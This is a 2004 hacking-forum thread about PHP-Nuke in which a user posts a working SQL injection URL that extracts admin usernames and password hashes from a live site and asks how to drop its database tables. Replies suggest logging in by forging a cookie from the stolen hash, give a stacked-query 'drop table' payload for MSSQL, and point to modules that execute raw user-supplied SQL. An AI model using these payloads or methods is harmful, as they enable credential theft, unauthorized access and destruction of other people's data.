 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
can i drop all db tables in nukes with sql injection? |
 |
 Posted: Wed Jun 23, 2004 3:53 pm |
 |
|
| emrag |
| Regular user |
 |
|
| Joined: Jun 03, 2004 |
| Posts: 20 |
| Location: TURKEY |
|
|
 |
|
 |
|
/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0
/**/FROM/**/nuke_authors/**/WHERE/**
/radminsuper=1/**/LIMIT/**/1/*
for example this bug is working on a site properly
but site admin changed admin.php's location so i can't login admin panel.
can i drop or db all tables or a few ?
if i can do this can you write code use this bug? 
sorry for bad english  |
|
|
|
|
|
a |
|
| Posted: Thu Jun 24, 2004 10:14 am |
|
|
| SteX |
| Advanced user |
 |
|
| Joined: May 18, 2004 |
| Posts: 181 |
| Location: Serbia |
|
|
|
|
|
|
| When you get Target Site admin md5 hash,you dont need admin.php ..Greate cookie with admin username and md5 hash and you are loged.. |
|
_________________
We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
------------------------------------------------------- |
|
|
|
| Posted: Thu Jun 24, 2004 11:15 am |
|
|
| emrag |
| Regular user |
|
|
| Joined: Jun 03, 2004 |
| Posts: 20 |
| Location: TURKEY |
|
|
|
|
|
|
ok
but i need drop tables |
|
|
|
|
|
Re: a |
|
| Posted: Thu Jun 24, 2004 9:13 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| SteX wrote: | | When you get Target Site admin md5 hash,you dont need admin.php ..Greate cookie with admin username and md5 hash and you are loged.. |
No, admin.php is needed for all administration operations. If its renamed or moved somewhere else, you cannot make any serious things. |
|
|
|
|
|
|
|
|
| Posted: Thu Jun 24, 2004 9:18 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| emrag wrote: | ok
but i need drop tables |
So called "UNION trick" is usable only within "SELECT FROM" queries. You cant use it within insert/update queries. And because mysql does not support (yet) multiple queries in one sentense, as for example mssql, then you cant for example drop some table within "SELECT FROM" sentence.
In mssql this is possible by using semicolon:
| Code: |
SELECT 1,2,3 FROM 4 WHERE 5=6 ; drop target_table; --
|
So final word - in mysql you cant do that. Unless you find some security hole to exploit remote file inclusion...  |
|
|
|
|
|
|
|
|
| Posted: Thu Jun 24, 2004 9:51 pm |
|
|
| madman |
| Active user |
 |
|
| Joined: May 24, 2004 |
| Posts: 46 |
|
|
|
|
|
|
|
Try to find PHP-Nuke 3rd party modules which use improper sql query, like:
| Code: | $sql = $_POST['sql_query'];
$result = mysql_query($sql); |
Well, it rarely to found, but who knows?
There tons of PHP-Nuke modules (and blocks) out there, and even created by noob. |
|
_________________
ch88rs,
madman |
|
|
|
www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 54
Members: 0
Total: 54
